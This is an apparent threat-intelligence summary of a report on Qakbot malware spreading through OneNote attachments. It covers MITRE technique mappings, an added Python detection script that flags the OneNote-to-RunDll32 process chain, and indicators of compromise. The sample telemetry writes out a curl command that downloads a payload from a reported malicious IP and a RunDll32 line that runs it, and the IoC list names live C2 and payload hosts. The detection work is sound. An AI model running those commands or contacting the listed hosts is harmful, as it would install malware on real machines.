Trellix researchers document Qakbot’s evolution to OneNote-based malware distribution, showing how OneNote attachments deliver a loader DLL and the main Qakbot payload across multiple campaigns. The report also covers how threat actors use OneNote to distribute other malware (AsyncRAT, IcedID, XWorm) and provides detection and prevention guidance. #Qakbot #OneNote #AsyncRAT #Icedid #XWorm #TA570 #TA577 #Office365 #ProLock #Egregor #DoppelPaymer
Key points
- Qakbot (Pinkslipbot) has evolved to use Microsoft OneNote documents as a new malware distribution vector, with multiple campaigns observed since January 2023.
- OneNote-based campaigns deliver a loader DLL which unpacks and loads the main Qakbot payload, enabling C2 communication and data exfiltration.
- Attack vectors include URL-embedded downloads and malicious OneNote attachments; OneNote call-to-action (CTA) buttons trigger the embedded payload once the user interacts with them.
- First-stage OneNote documents contain CMD scripts with base64-encoded commands that, once decoded, download remote payloads via PowerShell or curl and run them through RunDll32 or MSHTA.
- Second-stage loaders (e.g., libKF5ItemViews.dll) use obfuscation and anti-analysis techniques, with shellcode that decrypts and loads the main Qakbot DLL in memory.
- Qakbot uses persistence (scheduled tasks or Run keys) and process injection (often via hollowing into system processes) to maintain presence and perform discovery.
- Encrypted C2 configuration and IP lists are stored in DLL resources and decrypted with RC4 using sample-specific keys; campaigns include many proxy and direct C2 addresses.
MITRE Techniques
- [T1566.001] Phishing: Spearphishing Attachment – Lured user to open malicious OneNote attachment.
  Quoted: “Phishing: Spearphishing Attachment (T1566.001)”
- [T1204.002] User Execution: Malicious File – User opened malicious OneNote file attachment.
  Quoted: “User opened malicious OneNote file attachment.”
- [T1204.001] User Execution: Malicious Link – User clicks on malicious link included in the OneNote file.
  Quoted: “User clicks on malicious link included in the OneNote file”
- [T1218.005] System Binary Proxy Execution: MSHTA – OneNote spawns MSHTA to execute embedded .HTA file.
  Quoted: “OneNote spawns MSHTA to execute embedded .HTA file.”
- [T1105] Ingress Tool Transfer – MSHTA spawns cURL to download 2nd-stage payload.
  Quoted: “MSHTA spawns cURL to download 2nd stage payload.”
- [T1218.011] System Binary Proxy Execution: RunDll32 – RunDll32 is spawned to execute the 2nd-stage payload.
  Quoted: “spawns RunDll32 to execute 2nd stage payload.”
- [T1055.012] Process Injection: Process Hollowing – RunDll32 (Qbot) injects into a Windows system process (e.g., wermgr.exe).
  Quoted: “Process Hollowing (T1055.012)”
- [T1082] System Information Discovery – Core collects OS version, user, computer name, domain, etc.
  Quoted: “System information collection: In addition to general system information such as OS version, username, computer name, domain, screen resolution, system time, system uptime and bot uptime.”
- [T1047] Windows Management Instrumentation – Discovery via WMI queries after process injection.
  Quoted: “WMI queries are collected.”
- [T1518.001] Security Software Discovery – Checks for antivirus/EDR processes.
  Quoted: “Security Software Discovery (T1518.001)”
- [T1059.003] Command and Scripting Interpreter: Windows Command Shell – Discovery commands run via CMD (net view, arp, ipconfig, etc.).
  Quoted: “Injected Windows System Process (e.g., wermgr.exe) executes discovery commands via CMD.”
- [T1071.001] Application Layer Protocol: Web Protocols – C2 communication over web protocols.
  Quoted: “Application Layer Protocol: Web Protocols (T1071.001)”
- [T1027] Obfuscated Files and Information – String obfuscation and encrypted strings in the binary.
  Quoted: “Most of the significant string values in the malware binary have been encrypted…”
- [T1140] Deobfuscate/Decode Files or Information – Decryption routines recover strings and configuration.
  Quoted: “decrypted using static extraction… The following sections will present key features…”
- [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – Persistence via registry Run keys.
  Quoted: “Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (T1547.001)”
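The process lineage mapped above (OneNote → MSHTA/CMD → cURL/PowerShell → RunDll32 → hollowed system process running discovery) is what a detection engineer would hunt for in endpoint process-creation telemetry. The following is an added example written for this page, not code from Trellix or the report: it walks a parent/child process tree and tags events with the technique IDs listed above. The event schema, the PIDs, the `.hta` path, the export name on the RunDll32 command line and the benign control event are all constructed; the `Funds_834333.one` file name and the `60852.dat` download URL are the IoCs the report lists.

```python
"""Lineage-based detection for the OneNote -> LOLBin -> download -> RunDll32 chain.

Added example for this page (not Trellix's code). Event format and sample
events are constructed; only the file name and download URL come from the
report's IoC list.
"""
import ntpath
import re
from dataclasses import dataclass
from typing import Dict, List

@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # path or basename as logged by the EDR/Sysmon (constructed schema)
    cmdline: str

# Roles in the chain described by the report
ONENOTE = {"onenote.exe"}
LOLBIN_LAUNCHERS = {"mshta.exe", "cmd.exe"}        # T1218.005 / T1059.003
DOWNLOADERS = {"curl.exe", "powershell.exe"}       # T1105
PROXY_EXEC = {"rundll32.exe"}                      # T1218.011
# Discovery commands the report names (net view, arp, ipconfig)
DISCOVERY_RE = re.compile(r"\b(net view|arp|ipconfig)\b", re.IGNORECASE)

def norm(image: str) -> str:
    """Lower-cased basename so full paths and mixed case compare equal."""
    return ntpath.basename(image).lower()

def build_index(events: List[ProcEvent]) -> Dict[int, ProcEvent]:
    return {e.pid: e for e in events}

def ancestry(index: Dict[int, ProcEvent], pid: int, max_depth: int = 16) -> List[ProcEvent]:
    """Walk from pid up to the root, self first; bounded and cycle-safe."""
    chain, seen = [], set()
    cur = index.get(pid)
    while cur is not None and cur.pid not in seen and len(chain) < max_depth:
        chain.append(cur)
        seen.add(cur.pid)
        cur = index.get(cur.ppid)
    return chain

def detect_onenote_chain(events: List[ProcEvent]) -> List[dict]:
    """Return one finding per event that sits under OneNote in the reported chain."""
    index = build_index(events)
    findings = []
    for ev in events:
        lineage = ancestry(index, ev.pid)
        ancestors = [norm(p.image) for p in lineage[1:]]
        if not any(a in ONENOTE for a in ancestors):
            continue                      # not descended from OneNote: out of scope
        img = norm(ev.image)
        parent = ancestors[0] if ancestors else ""
        via_lolbin = any(a in LOLBIN_LAUNCHERS for a in ancestors)
        technique = None
        if img in DOWNLOADERS and via_lolbin:
            technique = "T1105"           # MSHTA/CMD child fetching the 2nd stage
        elif img in PROXY_EXEC and via_lolbin:
            technique = "T1218.011"       # RunDll32 executing the downloaded stage
        elif img == "mshta.exe" and parent in ONENOTE:
            technique = "T1218.005"       # OneNote spawning MSHTA for the .HTA
        elif img == "cmd.exe" and DISCOVERY_RE.search(ev.cmdline):
            technique = "T1059.003"       # discovery via CMD under the injected process
        if technique:
            findings.append({
                "pid": ev.pid,
                "image": img,
                "technique": technique,
                "chain": " > ".join(norm(p.image) for p in reversed(lineage)),
            })
    return findings

# Constructed sample telemetry; PIDs and paths are made up for the example.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE",
              r'ONENOTE.EXE "C:\Users\victim\Downloads\Funds_834333.one"'),   # file name from report
    ProcEvent(300, 200, "mshta.exe", r'mshta.exe "C:\Users\victim\AppData\Local\Temp\OneNote\open.hta"'),
    ProcEvent(400, 300, "curl.exe",
              r"curl.exe http://216.120.201.100/60852.dat -o C:\ProgramData\60852.dat"),  # URL from report
    ProcEvent(500, 300, "rundll32.exe", r"rundll32.exe C:\ProgramData\60852.dat,EntryPoint"),  # export name constructed
    ProcEvent(700, 500, "wermgr.exe", "wermgr.exe"),            # hollowed system process
    ProcEvent(800, 700, "cmd.exe", "cmd.exe /c net view"),      # discovery via CMD
    ProcEvent(600, 100, "rundll32.exe", "rundll32.exe shell32.dll,Control_RunDLL"),  # benign control
]

if __name__ == "__main__":
    for f in detect_onenote_chain(SAMPLE_EVENTS):
        print(f"{f['technique']:<10} pid={f['pid']:<4} {f['chain']}")
```

Anchoring every rule on a OneNote ancestor rather than on `rundll32.exe` or `curl.exe` alone is what keeps the benign `rundll32.exe shell32.dll` launch from Explorer out of the results; the same lineage walk can be reused for the other OneNote-delivered families the report mentions by widening the launcher and downloader sets.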
Indicators of Compromise
- [URL] – remote payload download URLs – http://216.120.201.100/60852.dat, http://185.104.195.9/87084.dat
- [MD5] – sample OneNote and loader – 83feba178d0097929e6efeb27719d5db, 891c7d5050fe852a032eeda9311498e8
- [SHA-256] – staged components – 033ca3aa775a34a7a4b6533b0fb744c9c71ab6cebec7e3f17a261e8f4edcdd01, e16e0faae0e9851a782d026f6692e34a9c7bae14c545aa8ac1e1ef033dfd06a8
- [File name] – OneNote sample – Funds_834333.one
- [IP] – Qakbot C2 addresses – 75.143.236.149:443, 47.34.30.133:443
- [Domain] – OneNote campaign domains – xxxprofxxx.dnsdojo.com:5126, xxxsthebagsxxx.mywire.org:6606